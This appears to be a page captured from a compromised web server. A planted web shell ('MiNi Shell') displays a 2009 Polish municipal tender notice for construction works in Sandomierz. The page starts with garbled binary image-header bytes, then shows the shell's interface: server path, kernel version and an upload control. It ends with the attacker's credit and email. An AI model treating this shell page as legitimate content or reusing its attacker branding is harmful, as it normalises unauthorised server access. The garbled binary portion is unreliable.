JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090602/176124-N-2009.html

<p class="kh_header"><b>Sandomierz: WZMOCNIENIE ZASOBÓW DZIEDZICTWA KULTUROWEGO I  PRZYRODNICZEGO MIASTA SANDOMIERZA- ETAP II
współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 176124 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Sandomierz , Plac Poniatowskiego 3, 27-600 Sandomierz, woj. świętokrzyskie, tel. 015 6440100, faks 015 6440100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sandomierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WZMOCNIENIE ZASOBÓW DZIEDZICTWA KULTUROWEGO I  PRZYRODNICZEGO MIASTA SANDOMIERZA- ETAP II
współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie prac budowlanych, dotyczących połączenia terenów nadwiślańskich ze Starym Miastem oraz Parkiem Piszczele w Sandomierzu.
Inwestycja obejmuje wykonanie następujących elementów:
> budowę ciągów komunikacyjnych wraz z robotami towarzyszącymi, o łącznej długości 0,817 km, w tym:
-	ciąg pieszo-rowerowy od ul. Krakowskiej do Wąwozu Piszczele,
-	ciąg pieszo-jezdny wzdłuż ul. Podwale Dolne,
-	ciąg pieszy między ulicami Podwale Dolne - Tatarska,
-	ciąg pieszy między ulicami Podwale Dolne - Podwale Górne,
> budowę parkingu u zbiegu ulic Podwale Górne i Podwale Dolne,
> wykonanie zagospodarowanie terenu u zbiegu ciągów pieszo-rowerowego, pieszo-jezdnego i pieszego jako Placu Spotkań (Rawelin), składającego się z części komunikacyjnej (ciągi piesze, place i schody terenowe) oraz części  zielonej (żywopłoty, nasadzenia kwiatowe, trawiaste zbocza, szpaler drzew),
> budowę budynku szaletu miejskiego o konstrukcji żelbetowej monolitycznej wraz z przyłączami wody zimnej, kanalizacji sanitarnej i energetycznym, wyposażonego w wewnętrzne instalacje wodno-kanalizacyjne i elektryczne, o następujących parametrach:
-	powierzchnia zabudowy	- 83,32 m2,
-	powierzchnia użytków	- 42,98 m2,
-	powierzchnia netto	- 59,85 m2,
-	kubatura	- 356,00 m3,
> budowę sieci linii kablowych zasilania elektrycznego i oświetlenia terenu
> budowę sieci kanalizacji sanitarnej,
> budowę sieci kanalizacji deszczowej wraz z separatorem koalescencyjnym,
> budowę sieci wodociągowej,
> regulację cieku wodnego,
> wykonanie elementów małej architektury takich jak ławki i kosze na śmieci oraz elementów nawiązujących do wydarzeń historycznych: koszokopy, kopie armat 
w skali 1:1,
> urządzenie projektowanej zieleni.
Projektowany ciąg pieszo-rowerowy założony jest na układzie zbliżonym do litery Y, gdzie jedno ramię prowadzi od ul. Podwale Dolne do Wąwozu Piszczele, drugie ramię tworzy ul. Podwale Dolne, a podstawa (nóżka) utworzona jest przez Ciąg pieszo-rowerowy od ul. Podwale Dolne do ul. Staromiejskiej i od. ul. Staromiejskiej do ul. Krakowskiej. Nieregularny, poszarpany kształt wynika z układu działek własnościowych (należących do Gminy Sandomierz) oraz ukształtowania terenu. Elementem geometryczno-kompozycyjnym układu jest Plac Spotkań (Rawelin), założony na rzucie trójkąta. Na Placu schodzą się ciągi komunikacyjne z czterech najważniejszych kierunków:
- od strony północno-zachodniej. ciąg pieszo-rowerowy prowadzący z Wąwozu Piszczele;
- od strony północno-wschodniej ciąg pieszo-jezdny - ul. Podwale Dolne;
- od strony wschodniej ciąg pieszy - ul. Za Bramą -prowadzący przez Ucho Igielne na Rynek Starego Miasta;
- od strony południowo-wschodniej ciąg pieszo-rowerowy od ul. Staromiejskiej.
Dodatkowo, na obszarze opracowania, przewidziano ciąg pieszo-rowerowy od ul. Staromiejskiej do ul. Krakowskiej, ciąg pieszy od. ul. Piszczele do ul. Tatarskiej oraz ciąg pieszy od ul. Tatarskiej do ul. Podwale Dolne, z przedłużeniem do ul. Podwale Górne. 
U wylotu ul. Podwale Dolne do ul. Podwale Górne zaprojektowano parking na 19 miejsc postojowych, w tym jedno na samochód osoby niepełnosprawnej. Po drugiej stronie ul. Podwale Górne zaprojektowano szalet miejski ukryty w skarpie ziemnej między ulicą, a murem obronnym. Przed szaletem plac, z którego jest wejście na istniejący parking.
Teren inwestycji zajmują w sumie powierzchnie około 5,2 ha, w tym:
-	powierzchnia zabudowy ( szalet miejski ) - ok. 83,32 m2
-	powierzchnia placów i komunikacji - ok. 7.400,00 m2
-	powierzchnia zieleni (trawniki, zieleń naturalna, zieleń przy ciągach komunikacyjnych) - ok. 44.768,0 m2.
Szczegółowy zakres i warunki wykonania robót budowlanych, będących przedmiotem zamówienia, określają:
-	Specyfikacje techniczne wykonania i odbioru robót budowlanych,
-	Projekt budowlany i projekty wykonawcze wraz z uzgodnieniami i pozwoleniami,
-	Przedmiary robót,
-	Informacja Dotycząca Bezpieczeństwa i Ochrony Zdrowia,
stanowiące integralne części  SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 03.00.00.00-1, 03.10.00.00-2, 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1, 03.11.00.00-5, 45.11.12.00-0, 45.11.12.91-4, 45.11.12.20-6, 45.11.12.91-4, 45.11.27.00-2, 45.21.00.00-2, 45.22.33.00-9, 45.22.35.00-1, 45.23.31.40-2, 45.23.31.61-5, 45.23.31.62-2, 45.23.32.22-1, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium- nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1.	posiadać uprawnienia do wykonywania działalności lub czynności oraz nie podlegać wykluczeniu na podstawie art. 24 Ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych. 
2.	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego Zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania Zamówienia. W szczególności Wykonawca musi spełniać następujące warunki: 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego Zamówienia przez dwóch lub więcej Wykonawców oceniany ich będzie łączny potencjał techniczny 
i kadrowy oraz łączne kwalifikacje i doświadczenia)
a)	posiadać przeciętne zatrudnienie w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w ilości zatrudnionych pracowników, co najmniej średniorocznie 50.
b)	posiadać przeciętną liczebność personelu kierowniczego w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w wysokości co najmniej średniorocznie 10 osób.
c)	dysponować następującymi narzędziami i urządzeniami, które wykaże Wykonawca, w tym co najmniej:
Lp.	OPIS
(Typ/Producent/Model)	Minimalna 
ilość sztuk 
1.		Koparko-spycharka 0,15 m3	-2;
2.		Koparka gąsienicowa 0,60 m3-1;
3.		Spycharka gąsienicowa 75 kM-1;
4.		Samochody samowyładowcze do 5 t-2;
5.		Samochody skrzyniowy 5-10 t-2;
6.		Żuraw samochodowy 5-6 t-	1;
7.		Ciągnik kołowy 55-63kW 75-85KM-1;
8.		Przyczepa skrzyniowa 3,5 t	-2;
9.		Walec wibracyjny samojezdny 7,5 t- 1;
10.		Wibrator powierzchniowy do 225 kG-2;
11.		Piła do cięcia kostki	-2;
12.		Pompa do betonu z ruroc. 20 m - 60m3/h-1;
13.		Betoniarki o poj. 150 l-2;
14.		Piła motorowa łańcuchowa 4,2KM-2;
15.		Spawarka elektr.wirująca 300 A-1;

d)	wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby/podmioty wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności.
> Przedstawiciel Wykonawcy - niniejsza osoba musi posiadać wykształcenie wyższe oraz doświadczenie i kwalifikacje:, co najmniej 3 lata w zarządzaniu projektami np. jako Kierownik Projektu lub Kierownik Zespołu (lub równoważne stanowisko np. Przedstawiciel Zamawiającego)
> Kierownik Budowy - niniejsza osoba musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz praktykę zawodową wynoszącą minimum 5 lat i obejmującą wykonanie, co najmniej 1-nej inwestycji o wartości brutto robót nie mniejszej niż 5 000 000,00 PLN
> Kierownik robót budowlanych- niniejsza osoba musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz praktykę zawodową wynoszącą minimum 3 lata i obejmującą wykonanie co najmniej 
1-nej inwestycji o wartości brutto robót nie mniejszej niż 2 500 000,00 PLN
> Kierownik robót sanitarnych- niniejsza osoba musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych oraz praktykę zawodową wynoszącą minimum 5 lat i obejmującą wykonanie co najmniej 2-ch inwestycji, w tym przynajmniej jednej o wartości brutto robót nie mniejszej niż 1 000 000,00 PLN
> Kierownik robót elektrycznych i akpia- niniejsza osoba musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektroenergetycznych oraz praktykę zawodową wynoszącą minimum 5 lat i obejmującą wykonanie co najmniej 2-ch inwestycji, w tym przynajmniej jednej o wartości brutto robót nie mniejszej niż 1 000 000,00 PLN
Osoby przewidziane przez Wykonawcę do pełnienia funkcji Kierownika Budowy 
i Kierowników robót, muszą posiadać aktualne zaświadczenia o przynależności do właściwej izby samorządu zawodowego (Okręgowej Izby Inżynierów Budownictwa).
e)	wykonać w okresie ostatnich 5 lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy- w okresie prowadzenia działalności, jako główny wykonawca, minimum jedno zadanie inwestycyjne w zakresie: budowa ciągów pieszo-rowerowych lub pieszo-jezdnych wraz z zagospodarowaniem terenu, elementami małej architektury oraz obiektami kubaturowymi i tym podobne, o wartości bruttu (wraz z podatkiem VAT) co najmniej 5 000 000,00 PLN, poparte referencjami poprzednich Zamawiających.
3. Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku): 
a)	wykonawca w każdym z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie osiągnął przychody netto ze sprzedaży w kwocie minimum 3 000 000,00 PLN.
b)	posiadać środki finansowe w wysokości co najmniej 1 000 000,00 PLN 
lub posiadać zdolność kredytową w wysokości co najmniej 1 000 000,00 PLN. 
c)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 3 000 000, 00 PLN.

Ocena spełniania przedstawionych powyżej warunków zostanie dokonana 
wg formuły: spełnia - nie spełnia.
Wykonawca udzieli :
- 36 miesięcznej gwarancji na wykonane roboty; 
- 12 miesięcy na dostarczone urządzenia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony formularz ofertowy wraz z załącznikiem.
2.	Oświadczenie z art. 22 ust.1 ustawy-Prawo zamówień publicznych.
3.	Informacja na temat przeciętnej liczby zatrudnionych pracowników.
4. 	Informację na temat przeciętnej liczebności personelu kierowniczego.
5. 	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń którymi dysponuje wykonawca.
6. 	Ewentualne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego.
7.	Wykaz osób- podmiotów które będą uczestniczyć w wykonaniu niniejszego zamówienia oraz opis doświadczenia zawodowego każdej z wymienionych osób wraz z dokumentami potwierdzającymi ich kwalifikacje niezbędne do wykonania zamówienia; kopie dołączonych dokumentów Wykonawca winien potwierdzić za zgodność z oryginałem (kserokopie uprawnień budowlanych oraz wpisy do izb kierownika budowy oraz kierowników robót).
8.	 Ewentualne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
9.	Wykaz wykonanych usług-robót oraz dokumenty potwierdzające, że wykonane przez Wykonawców usługi-roboty zostały wykonane należycie. 
Zaleca się aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców usługi/roboty zostały wykonane należycie muszą zawierać co najmniej: 
a.	wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu, zrealizował usługi/roboty, których dokument dotyczą,
b.	wskazanie podmiot, na rzecz którego zrealizowane były usługi/roboty,
c.	wskazanie zakres usług/ robót,
d.	wskazanie wartości usług-robót,
e.	wskazanie daty wykonania (rozpoczęcia i ukończenia),
f.	wskazanie miejsca wykonania,
g.	opinię podmiotu wskazanego powyżej w p. (b.) stwierdzającą, 
że usługi./roboty zostały wykonane należycie.
10.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
11.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
12.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
13.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego Zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego 
z nich),
14.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego Zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich)
15.	Rachunek zysków i strat oraz opinię biegłego rewidenta jeżeli sprawozdanie finansowe zgodnie z przepisami o rachunkowości podlega badaniu przez biegłego rewidenta, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających przychody netto, zobowiązania i należności za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres.    
16.	Informacja z banku lub spółdzielczej kasy oszczędnościowo- kredytowej, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej  wysokości,  
17.	Polisa lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 3 000 000, 00 mln PLN.
18.	Wyceniony przedmiar robót.
19.	Wykaz części zamówienia przeznaczonych do podwykonania (jeżeli dotyczy)- na formularzu oferty 
1.Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form 
w jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w: 
1)  pkt. 11,12 i 14- w części -Dokumenty wymagane od wykonawców- składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne
 i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie 
2) pkt. 13- w części -Dokumenty wymagane od wykonawców- składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt. 4-8 u.p.z.p
2.   	Na podstawie powołanego powyżej rozporządzenia Prezesa Rady Ministrów, dokumenty o których mowa w ppkt.1 a i c oraz ppkt.2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Natomiast dokument, o którym mowa powyżej w ppkt. 1b powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.   Stosownie do treści § 2 ust. 3 powołanego powyżej rozporządzenia Prezesa Rady Ministrów, jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej w pkt. 1 ppkt.1 lit.a,b,c oraz w ppkt.2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt. 2 stosuje się odpowiednio.

Brak jakiegokolwiek dokumentu skutkuje wykluczeniem Wykonawcy z niniejszego postępowania, a w konsekwencji odrzuceniem oferty tego Wykonawcy, stosownie do odpowiednich postanowień niniejszych Instrukcji, z zastrzeżeniem art.26 ust. 3 i 4.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.sandomierz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sandomierzu, Wydział Zamówień Publicznych, Plac Poniatowskiego 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2009 godzina 09:30, miejsce: Oferty należy składać w Biurze Obsługi Interesanta Urzędu Miejskiego w Sandomierzu, Plac Poniatowskiego 3, 27-600 Sandomierz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com